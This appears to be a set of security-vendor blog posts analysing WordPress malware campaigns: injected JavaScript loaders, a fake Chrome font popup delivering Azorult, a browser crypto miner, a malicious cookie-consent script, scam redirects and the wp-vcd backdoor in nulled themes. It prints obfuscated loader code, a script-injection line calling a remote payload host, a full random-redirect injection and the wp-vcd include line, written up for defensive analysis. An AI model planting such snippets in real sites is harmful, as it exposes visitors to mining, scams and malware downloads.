Multi-Vector WordPress Infection from Examhome

This September, we’ve been seeing a massive infection wave that injects malicious JavaScript code into .js and .php files and into the WordPress database.

The script looks like this:

eval(String.fromCharCode(118, 97, 114, 32, 115, 111, 109, 101,...skipped... 105, 108, 100, 40, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 41, 59, 32, 125))

If you decode it, it injects scripts from hxxps://ads.voipnewswire[.]net/ad.js and later hxxps://examhome[.]net/stat.js?v=1.0.2. Some other related URLs are hxxps://cdn.allyouwant[.]online/main.js?t=c and hxxps://mp3menu[.]org/mp3.js.

Sometimes links to such scripts are injected into the wp_posts table without any obfuscation whatsoever, e.g.

<script src='hxxps://cdn.examhome[.]net/cdn.js?ver=1.0.5' type='text/javascript'></script>

Many different attack vectors are being used in this campaign, and the location of the malware varies a lot. The more common versions of this malware can be found in .js files that have "jquery" in their names. Others are injected into the settings of vulnerable WordPress themes and plugins, for example very old tagDiv themes (Newspaper, Newsmag and their derivatives) or unpatched versions of the Smart Google Code Inserter plugin.

“Google Fonts” popup leads to malware

A recent malware injection in a client's WordPress file was found to target visitors who access the infected website with Google Chrome. The injected JavaScript detects whether the visitor is using Chrome and, once the visitor clicks on the page, generates a popup notification which falsely claims that Chrome is missing the HoeflerText font and that this is preventing the website from loading correctly.

It then instructs the visitor to click a button on the popup, which results in a malicious Azorult .exe being downloaded to the visitor's machine. This Azorult variant appears to have been updated recently; at the time of writing its detection rate among major anti-virus products was under 50%.


The popup text reads:

The "HoeflerText" font wasn't found.

The web page you are trying to load is displayed incorrectly, as it uses the "HoeflerText" font. To fix the error and display the text, you have to update the "Chrome Font Pack".

Step 1: In the bottom left corner of the screen you'll see the download bar. Click on the Chrome_Font.exe item.
Step 2: Press Yes(Run) in order to see the correct content on the web page.

Manufacturer:   Google Inc. All Rights Reserved
Current version:    Chrome Font Pack 53.0.2785.89
Latest version: Chrome Font Pack 57.2.5284.21

Update

Obfuscated JavaScript Crypto Miner

During an incident response investigation, we detected an interesting piece of heavily obfuscated JavaScript malware. Once decoded, it turned out to run a cryptocurrency miner in the browsers of visitors to the website.

At first glance the code below can look discouraging and frightening, but let’s review it and see how cleverly the attacker packaged the crypto miner loader that was placed into the ./wp-content/themes/responsive/header.php file:

<script>$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")
[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")
[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+
($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")
[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)
[$.$_][$.$_];$.$($.$($.$$+"\""+"\\"+$.__$+$.$$_+$.$$_+$.$_$_.
…...

The attacker placed the code at the top of a legitimate file. When a page of the website is opened, the browser executes the JavaScript and starts mining cryptocurrency.

Let’s work through the malicious code step by step to see how it works.

The first step is to get the code into a more readable format. The malicious code sits between the opening and closing script tags, as shown below:

<script>
    $ = ~[];
    $ = {
        ___: ++$,
        $$$$: (![] + "")[$],
        __$: ++$,
        $_$_: (![] + "")[$],
        _$_: ++$,
        $_$$: ({} + "")[$],
        $$_$: ($[$] + "")[$],
        _$$: ++$,
        $$$_: (!"" + "")[$],
        $__: ++$,
        $_$: ++$,
        $$__: ({} + "")[$],
        $$_: ++$,
        $$$: ++$,
        $___: ++$,
        $__$: ++$
    };
.....

Once the obfuscated malware has been decoded, it contains the following JavaScript code, which is used in the next phase of the infection.

Looking at the decoded code, we can see that the variable “el” holds a script element that pulls the final crypto miner payload from “web[.]clod[.]pw”:

var el = document.createElement('script');el.src='https://web[.]clod[.]pw/js/YQHHAAUDYwBFglDXg0VSBVWyEDQ5dxGCBTN…….

Now let’s look at the crypto miner payload that was pulled from “web[.]clod[.]pw” and see how it works.

This is a small piece of the malware that was pulled:

var _0xce82=['Y3VycmVudEpvYg==','WGZxVlU=','Z2V0VG90YWxIYXNoZXM=','dmxH','ZlBsVHA=','UmhsVEQ=','Tndoa0k=','RkhQZ2c=','Z2V0QWNjZXB0ZWRIYXNoZXM=','VXZV','WnZa','aHJjYWQ=','anB1cXI=','dGtMSkE=',
…...

Once we decode the content pulled from “web[.]clod[.]pw”, we see that it contains many functions that check for crawlers and mobile devices before deciding whether to start the crypto miner:

if (/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop
|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i
|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.
(browser|link)|vodafone|wap|windows ce|xda|xiino/i [_0x2ce8('0x7d')](b) || 
/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|
as(te|us)|attw|au(di|\-m|r |s ….

Once the checks have run, the script calls the miner, which uses the visitor's hardware to mine cryptocurrency for the attacker. Note that in the code below the outer condition "if (![])" is always false ("![]" evaluates to false), so the "else" branch, a bare runMiner(), executes every time; the referrer and storage checks in the first block are dead code:

if (![]) {                 // ![] is false: this block never runs
    if (document[_0x2ce8('0xae')][_0x2ce8('0xaf')](/google|yandex|mail|vk.com|ask|bing/) || localStorage[_0x2ce8('0xb0')](_0x2ce8('0xab')) || sessionStorage && sessionStorage[_0x2ce8('0xb0')](_0x2ce8('0xab'))) {
        localStorage[_0x2ce8('0xb2')](_0x2ce8('0xab'), 0x1);
        sessionStorage[_0x2ce8('0xb2')](_0x2ce8('0xab'), 0x1);
        runMiner();
    }
} else {
    runMiner();            // always reached
}
if (document[_0x2ce8('0x1d3')]) {   // names are resolved through the _0x2ce8 string table
    var node = document[_0x2ce8('0x1d3')](_0x2ce8('0x1cd'));
    if (node && node[_0x2ce8('0x1d5')]) {
        node[_0x2ce8('0x1d5')]();
    }
}
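Every property and method name in the payload is fetched as _0x2ce8('0xNN') from the base64-encoded string array _0xce82 shown earlier, which is what makes the gate above unreadable. The following is an added example written for this article, not the miner's code: it resolves that indirection in two passes (decode each accessor call into a string literal, then collapse obj["name"] into obj.name) so the gate reads as plain JavaScript. The table and the snippet are constructed to mirror the shape of the sample; the real table contents and indices are not reproduced, and a real obfuscator may also rotate the array or wrap the accessor in extra arithmetic, in which case the resolver throws rather than guess.

```javascript
// A constructed table in the same form as _0xce82: base64 of each string.
const TABLE = ['referrer', 'match', 'getItem', 'setItem', 'cm_seen']
  .map((s) => Buffer.from(s, 'utf8').toString('base64'));

// Constructed snippet in the shape of the miner's gate, using the table above.
const SAMPLE = [
  'if (![]) {',
  "  if (document[_0x2ce8('0x0')][_0x2ce8('0x1')](/google|yandex|mail|vk.com|ask|bing/) ||",
  "      localStorage[_0x2ce8('0x2')](_0x2ce8('0x4'))) {",
  "    localStorage[_0x2ce8('0x3')](_0x2ce8('0x4'), 0x1);",
  '    runMiner();',
  '  }',
  '} else {',
  '  runMiner();',
  '}',
].join('\n');

function escapeRegExp(s) { return s.replace(/[.*+?^${}()|[\]\\]/g, '\\$&'); }

// Pass 1: replace every accessor call with the decoded string literal it yields.
// An index past the end of the table means the array was rotated or the accessor
// does more than a lookup, so stop instead of producing a wrong decode.
function resolveStringArray(src, table, accessor) {
  const re = new RegExp(escapeRegExp(accessor) + "\\('(0x[0-9a-fA-F]+)'\\)", 'g');
  return src.replace(re, (_, hex) => {
    const i = parseInt(hex, 16);
    if (i >= table.length) throw new RangeError(`index ${hex} beyond table of ${table.length}`);
    return JSON.stringify(Buffer.from(table[i], 'base64').toString('utf8'));
  });
}

// Pass 2: obj["name"] -> obj.name when "name" is a plain identifier.
function collapseBracketAccess(src) {
  return src.replace(/\["([A-Za-z_$][\w$]*)"\]/g, '.$1');
}

function deobfuscate(src, table, accessor) {
  return collapseBracketAccess(resolveStringArray(src, table, accessor));
}

// console.log(deobfuscate(SAMPLE, TABLE, '_0x2ce8'));
```

With the names resolved, the constant-false outer guard and the unconditional runMiner() in the else branch are obvious at a glance; the same two passes apply to the crawler and mobile checks further up in the payload.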

If you think your website is infected, you can always trust the engineers from Sucuri to check it and clean it for you by visiting and subscribing at https://sucuri.net.

Cookie consent script used to distribute malware

Since the new EU regulations on website cookie usage came into force, many websites have added a notice about how they use cookies and ask visitors for their consent.


This has led many website owners to look for an easy way to implement such a notice, and we recently found one website using JavaScript from cookiescript[.]info to display the cookie consent request. When visiting the website for the first time in Chrome, you would get a JavaScript alert saying: “Your computer is infected. You have to check it with antivirus.”

Whether you click Cancel or OK, you are redirected to a website that tries to convince you to buy antivirus software, which may itself be malware. It looks like cookiescript[.]info is the site distributing this to unsuspecting users.

The malware we caught attempted to load JavaScript from:
cdn.front.to/libs/cookieconsent.min.4.js

That link just redirects to this URL:
hxxp://cdn[.]cookiescript[.]info/libs/cookiescript.min.js

The code inside that file loads some additional JavaScript, this time from “hxxp://cdn[.]cookiescript[.]info/libs/detect_ga.js”, which is the script responsible for detecting the user agent and setting a cookie in your browser.

Finally, hxxp://jsserver[.]info/alert.php gets loaded. It contains the alert message, along with the code responsible for the redirect to the malicious website selling the antivirus software.

The website cookiescript.info appears to be using Cloudflare to hide its IP addresses, and the domain is protected by WhoisGuard, so there is no easy way to say who owns this website. However, after some more digging, I was able to find some more details.

cookiescript[.]info. 86399 IN NS fred.ns.cloudflare.com.
cookiescript[.]info. 86399 IN NS mia.ns.cloudflare.com.

It appears that cookie-consent.org and front.to are also part of the same network. We also found some evidence which suggests that the malware has been operating for a few months already.

We highly recommend inspecting code before adding it to your website. It is always best to host all of the code on your own server rather than loading it from an external site, which can be compromised or simply be owned by malicious actors.

Reversed URLs Randomly Redirect to Scams

We are seeing hundreds of infected WordPress sites with the following script (originally on one line) injected in random places in the wp_posts table.


$vTB$I_919AeEAw2z$KX=function(n){if (typeof ($vTB$I_919AeEAw2z$KX.list[n]) == "string") return $vTB$I_919AeEAw2z$KX.list[n].split("").reverse().join("");return $vTB$I_919AeEAw2z$KX.list[n];};$vTB$I_919AeEAw2z$KX.list=["'php.nosj.ssalc/cni/xobloot-yendys/snigulp/tnetnoc-pw/moc.itnetaitak.www//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}

This code randomly (with a probability of around 20%, since Math.floor(Math.random() * 5) equals 3 one time in five) redirects visitors, after a 15-second timeout, to various scam sites (e.g. “browser review to win an iPad” or “tech support” scams). Note that setTimeout is handed a string rather than a function, so the browser evaluates the decoded redirect statement as code when the timer fires.

The redirect chains usually include domains like 3cal1ingc0nstant3111212[.]tk, 3worthysupp0rt310121[.]tk, techsupport60512123456[.]tk, 2bestsupp0rt310121[.]tk, etc. (they change frequently) and balans.shahterworld[.]org.

The very first redirect URL is hard-coded in reversed form (an obfuscation trick we see quite often) inside the injected script. In the above case the redirect code decodes to this:

document.location.href='hxxp://www.katiatenti[.]com/wp-content/plugins/sydney-toolbox/inc/class.json.php'

It is not the only redirect URL used in this campaign. We checked over 200 infected sites and found these four URLs, all of them on hacked sites themselves:

hxxp://emarketing-immobilier[.]com/wp-content/plugins/gotmls/safe-load/plugin-settings.php
hxxp://www.katiatenti[.]com/wp-content/plugins/sydney-toolbox/inc/class.json.php
hxxp://kodmax[.]com/wp-content/plugins/twitter-widget-pro/lib/class.widget.php
hxxp://nh70putera[.]com/wp-content/plugins/login-lockdown/plugin-settings.php

As always, if you need professional help to clean and protect your site, you can count on us.

Using Google and Facebook to aid distribution

Every now and then I check my spam mailbox for interesting malware (yes, I receive a lot of phishing messages and alerts that my payments are overdue), but most of the time it is more of the same: effortless malware, badly written messages, and not fun to analyze.


Today I was bored (it's that time of the year when you need to write tons of reports; sorry boss…) and I decided to follow the trail of some of the links in the messages I got. The first one was a "pleasant" surprise.

Usually I'd start by checking the message origin and writing about how it was sent and what was used to get control of the site, but this time I'll write about another aspect. (If you are wondering, it is a WordPress site with a vulnerable revslider in the site's theme that allowed the attacker to gain privileged access to the site.)

For those not fluent in Brazilian Portuguese, this message says that I have an overdue payment and that a new "boleto" (a common barcode payment method in Brazil) is attached. The interesting part is that they refer to me by my personal email alias and not my full name, yet they got my CPF (Brazil's equivalent of a Social Security Number) right; it probably came from some leaked data (not that uncommon here).

Everything in this message is clickable, and all of the links send you to the same Google-shortened URL, which resolves to Facebook's fbsbx.com domain, the domain Facebook uses to store attachments shared in chats and groups.

It is pretty interesting that they rely on such services to "host" their files instead of using another hacked site to store the malware. I monitored this file and, although the link was set to expire on Fri, 22 Dec 2017 16:15:47 GMT, it was taken down less than 24 hours after I received the scam email, probably by a Facebook malware scan process.

WP-VCD Malware Comes with Nulled Themes

Recently we wrote about the wp-vcd malware that creates rogue WordPress admin users (100010010) and injects spam links.

Our readers noticed that the “nulled” premium theme sites promoted by the injected links (and some other similar sites) ship this very wp-vcd malware pre-installed in every downloadable theme.

It’s easy to notice when you check the files inside the downloaded .zip archives. All the original files share one date, but two files have a different, more recent date:


12914 Dec  4 09:25 functions.php
33045 Nov 30 09:33 class.theme-modules.php

And if you check those files, you’ll notice that functions.php has this line of code at the top:

<?php if (file_exists(dirname(__FILE__) . '/class.theme-modules.php')) include_once(dirname(__FILE__) . '/class.theme-modules.php'); ?>

And class.theme-modules.php (the file included by the line added to functions.php) is the file that installs the wp-vcd malware into the theme and creates the rest of the malicious files.

The beginning of that file looks like this (the base64 blob starts with PD9waHANCmVycm9y, which decodes to "<?php\r\nerror", i.e. it holds more PHP code):

<?php //install_code1
error_reporting(0);
ini_set('display_errors', 0);
DEFINE('MAX_LEVEL', 2);
DEFINE('MAX_ITERATION', 50);
DEFINE('P', $_SERVER['DOCUMENT_ROOT']);
$GLOBALS['WP_CD_CODE'] = 'PD9waHANCmVycm9y...long base64-encoded string here followed by installation code......

Providing “nulled” content with backdoors, spam and other types of malware is typical of sites that offer premium software “for free”. We have warned against using nulled themes and plugins many times.

Cleaning sites with such malware may not be that easy, as it downloads and installs more malware as soon as you begin using the contaminated theme or plugin, and the backdoor it creates allows the bad guys to do almost anything with your site. That’s why a thorough site analysis and cleanup is required. Let us know if you need our help.